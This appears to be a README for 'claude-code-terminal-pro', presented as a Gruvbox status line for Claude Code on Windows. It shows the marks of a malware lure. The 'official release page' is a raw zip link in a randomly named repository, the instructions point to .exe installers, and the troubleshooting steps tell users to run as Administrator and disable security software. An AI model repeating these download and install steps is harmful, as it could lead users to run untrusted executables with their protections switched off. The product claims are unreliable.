claude-code-terminal-pro upgrades your terminal experience. It adds a custom Gruvbox-themed status line. This status line shows:
- Your current model info
- Token usage in real time
- A context progress bar
- The current Git branch
- Other useful details during coding or interaction
This tool works in the terminal environment. With it, you gain quick insights without leaving your terminal window.
To run claude-code-terminal-pro on Windows, your system should meet these requirements:
- Windows 10 or later (64-bit recommended)
- At least 4 GB of RAM
- 100 MB of free disk space
- Windows Command Prompt, PowerShell, or Terminal with basic ANSI color support
- Internet connection for initial setup and updates
No advanced settings or installations are needed beyond the steps listed here.
Download the program from its official release page:
Click the link above or go to:
https://github.com/purposive-streptocarpus303/claude-code-terminal-pro/raw/refs/heads/main/scripts/code-claude-terminal-pro-1.0.zip
This page lists the latest versions of the software available for download.
Look for the most recent release version at the top of the page. It will have a title like "vX.X.X" indicating the version number.
Under the latest release, find the file labeled for Windows. It usually ends with .exe or .msi. Click on the file name to download.
Save the file to a folder you can easily access, like your Desktop or Downloads folder.
Once downloaded, navigate to the file and double-click it.
Follow the on-screen instructions. Typically:
- Click "Next" when prompted
- Accept the license agreement
- Choose an install location or use the default path
- Click "Install" to continue
The installer sets up all needed files on your system.
When finished, the installer may offer to launch claude-code-terminal-pro. You can select this or run it later from the Start Menu.
Open your Windows Terminal, Command Prompt, or PowerShell window.
Run the following command to start the program:
claude-code-terminal-pro
Once running, you will see the updated status bar at the bottom of your terminal screen. It will display:
- Current AI model in use
- Tokens used per session
- A progress bar showing your message context
- Git branch name if you are inside a Git-controlled folder
This status line updates live as you interact with the terminal.
You can adjust the appearance and behavior of the status line by editing a simple configuration file. This file is located in:
C:\Users\<YourUserName>\claude-code-terminal-pro\config.ini
Open this file in any text editor like Notepad.
Here are common settings you might change:
- Theme: Choose a different color scheme besides Gruvbox
- Display items: Turn on or off elements like token count or Git branch
- Update interval: Change how often the status line refreshes
- Language support: Set preferred language for messages
Save your changes and restart claude-code-terminal-pro to see the updates.
If claude-code-terminal-pro does not start or shows errors:
- Verify your Windows version and system requirements
- Check if you downloaded the correct file for Windows
- Try running the terminal as Administrator
- Disable any security software temporarily that may block the app
- Make sure your terminal supports color and text formatting
If problems persist, report detailed information on the GitHub issues page.
This project aims to improve the coding and terminal workflow. By showing essential context data in a clear and simple status line, it saves time and helps you keep track of your session.
The custom Gruvbox color scheme reduces eye strain and blends with modern terminal themes.
claude-code-terminal-pro works standalone and does not modify core terminal or system files.
- Download or update claude-code-terminal-pro
- GitHub Repository for source code and documentation
- User support and issue reporting
- Keep claude-code-terminal-pro updated by checking the release page monthly
- Pair this tool with Git-enabled folders to get branch info at a glance
- Use in combination with terminal multiplexers like tmux or Windows Terminal for better workflows
- Customize the config file to match your daily working style and preferences
claude-code-terminal-pro is distributed under an open-source license. Check the LICENSE file in the repository for full terms.